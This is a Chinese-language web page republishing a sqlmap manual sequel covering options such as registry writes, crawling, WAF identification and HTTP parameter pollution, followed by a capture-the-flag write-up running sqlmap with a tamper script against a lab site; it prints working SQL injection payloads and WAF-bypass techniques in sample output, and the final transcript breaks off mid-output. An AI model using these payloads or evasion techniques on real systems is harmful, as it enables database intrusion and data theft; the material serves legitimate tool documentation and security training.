sqlmap用户手册[续篇]
互联网 & 发布时间： 10:37:58 & 作者：佚名 &
上一篇文章《sqlmap用户手册》其实只写了大部分可能用到的参数，还有些并未写，这次补上~
ps：其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊，现在的人通读看文章的耐心都没有了，遇到了哪个问题就想起针对这个问题求助，却不知道仔细看完之后，以后可以省多少时间来求助，吐槽完毕，正文开始：
对Windows注册表操作当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前web应用支持堆查询。 当然，当前连接数据库的用户也需要有权限操作注册表。
读取注册表值
参数：-reg-read
写入注册表值
参数：-reg-add
删除注册表值
参数：-reg-del
注册表辅助选项
参数：-reg-key，-reg-value，-reg-data，-reg-type
需要配合之前三个参数使用，例子：
$ python sqlmap.py -u
--reg-add --reg-key=&HKEY_LOCAL_MACHINESOFTWAREsqlmap& --reg-value=Test --reg-type=REG_SZ --reg-data=1&常规参数从sqlite中读取session
sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件，如果用户想指定读取的文件路径，就可以用这个参数。
保存HTTP(S)日志
这个参数需要跟一个文本文件，sqlmap会把HTTP(S)请求与响应的日志保存到那里。
非交互模式
参数：-batch
用此参数，不需要用户输入，将会使用sqlmap提示的默认值一直运行下去。
强制使用字符编码
参数：-charset
不使用sqlmap自动识别的（如HTTP头中的Content-Type）字符编码，强制指定字符编码如：
--charset=GBK爬行网站URL
参数：-crawl
sqlmap可以收集潜在的可能存在漏洞的连接，后面跟的参数是爬行的深度。
$ python sqlmap.py -u && --batch --crawl=3[...][xx:xx:53] [INFO] starting crawler[xx:xx:53] [INFO] searching for links with depth 1[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while[xx:xx:53] [INFO] searching for links with depth 2[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'[xx:xx:00] [INFO] 42/56 links visited (75%)[...]
规定输出到CSV中的分隔符
参数：-csv-del
当dump保存为CSV格式时（-dump-format=CSV），需要一个分隔符默认是逗号，用户也可以改为别的 如：
--csv-del=&;&&DBMS身份验证
参数：-dbms-cred
某些时候当前用户的权限不够，做某些操作会失败，如果知道高权限用户的密码，可以使用此参数，有的数据库有专门的运行机制，可以切换用户如Microsoft SQL Server的OPENROWSET函数
定义dump数据的格式
参数：-dump-format
输出的格式可定义为：CSV，HTML，SQLITE
预估完成时间
参数：-eta
可以计算注入数据的剩余时间。
例如Oracle的布尔型盲注：
$ python sqlmap.py -u && -b --eta
[...][hh:mm:01] [INFO] the back-end DBMS is Oracle[hh:mm:01] [INFO] fetching banner[hh:mm:01] [INFO] retrieving the length of query output[hh:mm:01] [INFO] retrieved: 6417% [========&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ] 11/64& ETA 00:19&
100% [===================================================] 64/64[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Oraclebanner:&&& 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'&sqlmap先输出长度，预计完成时间，显示百分比，输出字符
刷新session文件
参数：-flush-session
如果不想用之前缓存这个目标的session文件，可以使用这个参数。 会清空之前的session，重新测试该目标。
自动获取form表单测试
参数：-forms
如果你想对一个页面的form表单中的参数测试，可以使用-r参数读取请求文件，或者通过-data参数测试。 但是当使用-forms参数时，sqlmap会自动从-u中的url获取页面中的表单进行测试。
忽略在会话文件中存储的查询结果
参数：-fresh-queries
忽略session文件保存的查询，重新查询。
使用DBMS的hex函数
参数：-hex
有时候字符编码的问题，可能导致数据丢失，可以使用hex函数来避免：
针对PostgreSQL例子：
$ python sqlmap.py -u && --banner --hex -v 3 --parse-errors
[...][xx:xx:14] [INFO] fetching banner[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)[xx:xx:15] [INFO] parsed error message: 'pg_query() [&a href='function.pg-query'&function.pg-query&/a&]: Query failed: ERROR:& invalid input syntax for type numeric: &:vtj:506f514c206f6ede2c96c632d342e332eed312e2e32:nxb:& in &b&/var/www/sqlmap/libs/pgsql.inc.php&/b& on line &b&35&/b&'[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled byGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2[...]&自定义输出的路径
参数：-output-dir
sqlmap默认把session文件跟结果文件保存在output文件夹下，用此参数可自定义输出路径 例如：-output-dir=/tmp
从响应中获取DBMS的错误信息
参数：-parse-errors
有时目标没有关闭DBMS的报错，当数据库语句错误时，会输出错误语句，用词参数可以会显出错误信息。
$ python sqlmap.py -u && --parse-errors[...][11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.&b&/sqlmap/mssql/iis/get_int.asp, line 27&/b&'[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.&b&/sqlmap/mssql/iis/get_int.asp, line 27&/b&'[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.&b&/sqlmap/mssql/iis/get_int.asp, line 27&/b&'[11:12:17] [INFO] target URL appears to have 3 columns in query[...]&其他的一些参数使用参数缩写
有使用参数太长太复杂，可以使用缩写模式。 例如：
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u &&&可以写成：
python sqlmap.py -z &bat,randoma,ign,tec=BEU& -u &&&还有：
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u &&&可以写成：
python sqlmap.py -z &ign,flu,bat,tec=U,dump,D=testdb,T=users& -u &&&成功SQL注入时警告
参数：-alert
设定会发的答案
参数：-answers
当希望sqlmap提出输入时，自动输入自己想要的答案可以使用此参数： 例子：
$ python sqlmap.py -u & --answers=&extending=N& --batch[...][xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N[...]&发现SQL注入时发出蜂鸣声
参数：-beep
发现sql注入时，发出蜂鸣声。
启发式检测WAF/IPS/IDS保护
参数：-check-waf
WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰，如果怀疑目标有此防护的话，可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2&1如果有保护的话可能返回结果会不同。
清理sqlmap的UDF(s)和表
参数：-cleanup
清除sqlmap注入时产生的udf与表。
禁用彩色输出
参数：-desable-coloring
sqlmap默认彩色输出，可以使用此参数，禁掉彩色输出。
使用指定的Google结果页面
参数：-gpage
默认sqlmap使用前100个URL地址作为注入测试，结合此选项，可以指定页面的URL测试。
使用HTTP参数污染
参数：-hpp
HTTP参数污染可能会绕过WAF/IPS/IDS保护机制，这个对ASP/IIS与ASP.NET/IIS平台很有效。
测试WAF/IPS/IDS保护
参数：-identify-waf
sqlmap可以尝试找出WAF/IPS/IDS保护，方便用户做出绕过方式。目前大约支持30种产品的识别。
例如对一个受到ModSecurity WAF保护的MySQL例子：
$ python sqlmap.py -u && --identify-waf -v 3[...][xx:xx:23] [INFO] testing connection to the target URL[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'[xx:xx:23] [DEBUG] page not found (404)[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')[...]&模仿智能手机
参数：-mobile
有时服务端只接收移动端的访问，此时可以设定一个手机的User-Agent来模仿手机登陆。
$ python sqlmap.py -u && --mobile[...]which smartphone do you want sqlmap to imitate through HTTP User-Agent header?[1] Apple iPhone 4s (default)[2] BlackBerry 9900[3] Google Nexus 7[4] HP iPAQ 6365[5] HTC Sensation[6] Nokia N97[7] Samsung Galaxy S& 1[...]&安全的删除output目录的文件
参数：-purge-output
有时需要删除结果文件，而不被恢复，可以使用此参数，原有文件将会被随机的一些文件覆盖。
$ python sqlmap.py --purge-output -v 3[...][xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...[xx:xx:55] [DEBUG] changing file attributes[xx:xx:55] [DEBUG] writing random data to files[xx:xx:55] [DEBUG] truncating files[xx:xx:55] [DEBUG] renaming filenames to random values[xx:xx:55] [DEBUG] renaming directory names to random values[xx:xx:55] [DEBUG] deleting the whole directory tree[...]&启发式判断注入
参数：-smart
有时对目标非常多的URL进行测试，为节省时间，只对能够快速判断为注入的报错点进行注入，可以使用此参数。
$ python sqlmap.py -u && --batch --smart[...][xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable[xx:xx:14] [INFO] skipping GET parameter 'ca'[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable[xx:xx:14] [INFO] skipping GET parameter 'user'[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic[xx:xx:14] [INFO] GET parameter 'id' is dynamic[xx:xx:14] [WARNING] reflective value(s) found and filtering out[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause'[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries'[xx:xx:14] [INFO] testing 'MySQL & 5.0.11 stacked queries'[xx:xx:14] [INFO] testing 'MySQL & 5.0.12 stacked queries (heavy query)'[xx:xx:14] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL & 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[xx:xx:24] [INFO] target URL appears to have 3 columns in query[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable[...]&初级用户向导参数
参数：-wizard 面向初级用户的参数，可以一步一步教你如何输入针对目标注入。
$ python sqlmap.py --wizard
&&& sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:25:26
Please enter full target URL (-u): POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose:[1] Normal (default)[2] Medium[3] Hard& 1Enumeration (--banner/--current-user/etc). Please choose:[1] Basic (default)[2] Smart[3] All& 1
sqlmap is running, please wait..
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] YGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 25 HTTP(s) requests:---Place: GETParameter: id&&& Type: boolean-based blind&&& Title: AND boolean-based blind - WHERE or HAVING clause&&& Payload: id=1 AND
&&& Type: error-based&&& Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause&&& Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN () THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
&&& Type: UNION query&&& Title: Generic UNION query (NULL) - 3 columns&&& Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--
&&& Type: stacked queries&&& Title: Microsoft SQL Server/Sybase stacked queries&&& Payload: id=1; WAITFOR DELAY '0:0:5'--
&&& Type: AND/OR time-based blind&&& Title: Microsoft SQL Server/Sybase time-based blind&&& Payload: id=1 WAITFOR DELAY '0:0:5'--
&&& Type: inline query&&& Title: Microsoft SQL Server/Sybase inline queries&&& Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN () THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))---web server operating system: Windows XPweb application technology: ASP, Microsoft IIS 5.1back-end DBMS operating system: Windows XP Service Pack 2back-end DBMS: Microsoft SQL Server 2005banner:---Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) &&& Oct 14 :37 &&& Copyright (c)
Microsoft Corporation&&& Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)---current user:&&& 'sa'current database:&&& 'testdb'current user is DBA:&&& True
[*] shutting down at 11:25:52link:http://drops.wooyun.org/tips/401
大家感兴趣的内容
12345678910
最近更新的内容&nbsp>&nbsp
&nbsp>&nbsp
&nbsp>&nbsp
简单的sql注入之2WP
摘要：这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已就不截图了,以下是我从KALI的终端上复制的这里用的level参数是执行测试的等级(1-5,默认为1)sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTPCookie头的
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等
流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –level 2
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:16:47
[21:16:47] [INFO] loading tamper script ‘space2comment’ [21:16:47] [INFO] testing connection to the target URL [21:16:47] [INFO] heuristics detected web page charset ‘GB2312’ [21:16:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [21:16:47] [INFO] testing if the target URL is stable [21:16:48] [INFO] target URL is stable [21:16:48] [INFO] testing if GET parameter ‘id’ is dynamic [21:16:48] [INFO] confirming that GET parameter ‘id’ is dynamic [21:16:48] [INFO] GET parameter ‘id’ is dynamic [21:16:48] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’) [21:16:48] [INFO] heuristic (XSS) test shows that GET parameter ‘id’ might be vulnerable to XSS attacks [21:16:48] [INFO] testing for SQL injection on GET parameter ‘id’ it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (2) and risk (1) values? [Y/n] y [21:16:54] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’ [21:16:54] [WARNING] reflective value(s) found and filtering out [21:16:55] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind - WHERE or HAVING clause’ injectable [21:16:55] [INFO] testing ‘MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’ [21:16:55] [INFO] GET parameter ‘id’ is ‘MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’ injectable [21:16:55] [INFO] testing ‘MySQL inline queries’ [21:16:55] [INFO] testing ‘MySQL & 5.0.11 stacked queries (SELECT - comment)’ [21:16:55] [WARNING] time-based comparison requires larger statistical model, please wait…….. [21:16:55] [INFO] testing ‘MySQL & 5.0.11 stacked queries (SELECT)’ [21:16:55] [INFO] testing ‘MySQL & 5.0.11 stacked queries (comment)’ [21:16:55] [INFO] testing ‘MySQL & 5.0.11 stacked queries’ [21:16:55] [INFO] testing ‘MySQL & 5.0.12 stacked queries (heavy query - comment)’ [21:16:55] [INFO] testing ‘MySQL & 5.0.12 stacked queries (heavy query)’ [21:16:56] [INFO] testing ‘MySQL &= 5.0.12 AND time-based blind (SELECT)’ [21:17:06] [INFO] GET parameter ‘id’ seems to be ‘MySQL &= 5.0.12 AND time-based blind (SELECT)’ injectable [21:17:06] [INFO] testing ‘Generic UNION query (NULL) - 1 to 20 columns’ [21:17:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [21:17:07] [INFO] testing ‘Generic UNION query (NULL) - 22 to 40 columns’ [21:17:09] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns’ [21:17:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [21:17:09] [INFO] target URL appears to have 1 column in query [21:17:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. ‘–dbms=mysql’) [21:17:10] [INFO] testing ‘MySQL UNION query (random number) - 1 to 20 columns’ [21:17:10] [INFO] testing ‘MySQL UNION query (NULL) - 22 to 40 columns’ [21:17:12] [INFO] testing ‘MySQL UNION query (random number) - 22 to 40 columns’ [21:17:16] [INFO] testing ‘MySQL UNION query (NULL) - 42 to 60 columns’ [21:17:17] [INFO] testing ‘MySQL UNION query (random number) - 42 to 60 columns’ [21:17:19] [INFO] testing ‘MySQL UNION query (NULL) - 62 to 80 columns’ [21:17:21] [INFO] testing ‘MySQL UNION query (random number) - 62 to 80 columns’ [21:17:22] [INFO] testing ‘MySQL UNION query (NULL) - 82 to 100 columns’ [21:17:23] [INFO] testing ‘MySQL UNION query (random number) - 82 to 100 columns’ GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 242 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
[21:18:02] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:18:02] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:18:02] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:18:02
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –current-db
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:18:22
[21:18:22] [INFO] loading tamper script ‘space2comment’ [21:18:22] [INFO] resuming back-end DBMS ‘mysql’ [21:18:23] [INFO] testing connection to the target URL [21:18:23] [INFO] heuristics detected web page charset ‘GB2312’ [21:18:23] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
[21:18:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:18:23] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:18:23] [INFO] fetching current database [21:18:23] [INFO] retrieved: web1 current database: ‘web1’ [21:18:23] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:18:23
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web10 –tables
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:18:43
[21:18:43] [INFO] loading tamper script ‘space2comment’ [21:18:43] [INFO] resuming back-end DBMS ‘mysql’ [21:18:43] [INFO] testing connection to the target URL [21:18:43] [INFO] heuristics detected web page charset ‘GB2312’ [21:18:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
[21:18:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:18:43] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:18:43] [INFO] fetching tables for database: ‘web10’ [21:18:43] [INFO] fetching number of tables for database ‘web10’ [21:18:43] [WARNING] running in a single-thread mode. Please consider usage of option ‘–threads’ for faster data retrieval [21:18:43] [INFO] retrieved: [21:18:43] [WARNING] reflective value(s) found and filtering out 0 [21:18:53] [WARNING] database ‘web10’ appears to be empty [21:18:53] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] y [21:19:00] [INFO] checking table existence using items from ‘/usr/share/sqlmap/txt/common-tables.txt’ [21:19:00] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] 10 [21:19:03] [INFO] starting 10 threads [21:20:37] [INFO] tried
items (80%) [21:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s) [21:20:37] [WARNING] if the problem persists please try to lower the number of used threads (option ‘–threads’)
[21:21:09] [WARNING] no table(s) found No tables found [21:21:09] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:21:09
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 –tables
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:21:47
[21:21:47] [INFO] loading tamper script ‘space2comment’ [21:21:48] [INFO] resuming back-end DBMS ‘mysql’ [21:21:48] [INFO] testing connection to the target URL [21:21:48] [INFO] heuristics detected web page charset ‘GB2312’ [21:21:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
